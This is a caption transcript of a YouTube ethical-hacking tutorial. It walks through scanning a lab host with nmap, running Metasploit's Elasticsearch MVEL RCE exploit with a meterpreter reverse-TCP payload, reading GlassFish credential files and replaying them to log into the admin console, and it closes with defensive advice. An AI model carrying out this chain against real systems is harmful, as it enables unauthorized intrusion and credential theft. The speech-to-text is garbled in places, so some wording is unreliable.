How Hackers Login To Any Websites Without Password?!

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hi and welcome back to another episode on how to hack and today we'll be learning about how you can get access into a system without trying Brute Force attacks [Music] yes I know this sounds crazy but it can absolutely be done you just really have to understand how those applications store their passwords and credentials and all you got to do then is just to replay the password into the login field and that's it it came over and remember kids hacking is legal if you want to hack do not try to hack against hacker law because hacker law can fire IP address your password and everything about you and the reason why this can be happening is because one there is another vulnerable service within the target server and the hacker gained access over into the service and after which the hacker then go over into the listing of the photos directory and the final that okay in this particular other service there is a config folder and in a config folder they store all these different credentials like your usernames your password views whether they're hash and plain tags this allows a hacker to do a replay and from the replay they can directly gain access back into the original intended service and from that service this gives them access to the Target console of that service or application so right in front of us we're on Kyle Linux and this is going to be our hackers box we'll be using this to Target the machine and the very first thing you can typically do is to enter for example nmap so nmap we have of course the look at the service version and we're targeting all the ports so this may take some time to complete and Then followed by the IP address or the Target website or the target domain name and a simple example is I can enter and map followed by hackerelai.com so once I enter the domain name I hit enter and that we'll be scanning against the target domain of hackoly.com and of course in this case we can see the following of the IP address as well as the ports that are open from this specific domain name so in three two one let's go ahead and hit enter on that and begin the scanning process to look at all this open Services of the target IP address and once you're ready we'll be able to look at all these different services and see which one of them has a login page and after which we can Target on it so you can see right here we got the scan completed so this is awesome and we can see of course several examples of HTTP servers we can see MySQL we have SSL HTTP and all these different HTTP accesses that we can enter into a browser and then after which Target IP address and domain name and we'll be able to open it up and see what we got there and of course in this case we'll be targeting 4848 which is an oracle gloss fish right so let's go ahead and open up a browser and go in right there so we can open up say for example Firefox ESR and then we can Target IP address in this case of course we have the 192 168.0 0.113 followed by the 48484 report number hit enter on that and you can see right here we on the glassfish server open source Edition and here we got the username as well as the password field but first we do not know what exactly is the username password so we have to Pivot from other services that may be vulnerable so that we can find out the username password and gain access into the site good news is that with multiple services that are open up so that we can try to gain access to them and one of it is part 9200 so what we can do now is go back over into the target IP address so in this case we could be using a browser and we can enter the browser all right for the IP address and then follow by 9200 hit enter on that and we can see the following okay we have the version number we have the tech line so this is using an elastic search service and next up what we can do is we can jump over into another terminal enter pseudo msf console I want to search out for a exploit that we can use to Target another service okay so the idea is to gain access into the server and then after which be able to enumerate some of the other files that could be stored in a gloss fish fall or directory so what we can do now is enter search for why elastic in entering that and we can see the following we have the exploit multi-elastic search script mvel rce so what we can do now is go ahead and enter use zero and the good thing is of course we're defaulting to Java meterpreter reverse TCP enter show options on this and what we can see right here is that we can n30 our hosts so go ahead and enter set our host of the IP address 192.168.0.113 hit enter on that and that's it done we are ready we're ready go ahead and exploit on it go ahead and enter run and we can see the following right here remote OS is Windows Server we have sending of the stage on the Windows 10 directory or file folder and here what we can do now is once we are in we'll be able to do an enumeration so you can see right here meter Prado Session One open what we can do next is go ahead and enter shout and once we're in Shell what we can do is to move over into the glassfish directory so once we're here enter dir okay and we can see over here once again all right so looking out for interesting files that we can gain access into so CD into config so config is the place where you're storing a lot of all these different configuration details and this is going to be a key place for us to gain access into the site so here we can enter type local followed by Dash password okay hit enter on that and we got the following right here so this is something that we can reuse as part of logging in into the site so I can do a copy of selection and what we can do next is to do another type to Target another file over here which is the admin key file so go ahead and enter type admin Dash key file hit enter on that and we got a following so we got admin and we got char256 all right we got all these different details go back over the login screen of glassfish enter the username of admin and go ahead and paste the following values that we have just copied over into so do a right click inspect element and then of course I can change it up over here I can change say for example the type of password I hit enter and I remove this and we can see that we're copy and pasting it right here click login in three two one click login and we'll be seeing something really interesting in a moment all right logging in to the glassfish console right here we are in we have access over into the service right now so in order to defend against this type of attack one is that you need to scan your service regularly and looking out for all these different vulnerabilities and then be able to protect them say using some form of web application firewall so that you can prevent unauthorized accesses to different parts of those critical paths number two is that you need to constantly update all these different services that are residing within your server so you have to update the services like gloss fish as well as your elasticsearch and all these different services that you use to host and provide services to all the different applications or systems number three you need to be able to set the right permissions so that even when a specific service has been compromised they are not able to browse over into other folders or directories being able to view all of those configuration files so once again I hope you learned something valuable in today's tutorial like share subscribe and turn on notifications so that you do not get hacked

Info

Channel: Loi Liang Yang

Views: 469,048

Rating: undefined out of 5

Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp

Id: OTY_z5tzCRU

Channel Id: undefined

Length: 6min 49sec (409 seconds)

Published: Fri May 06 2022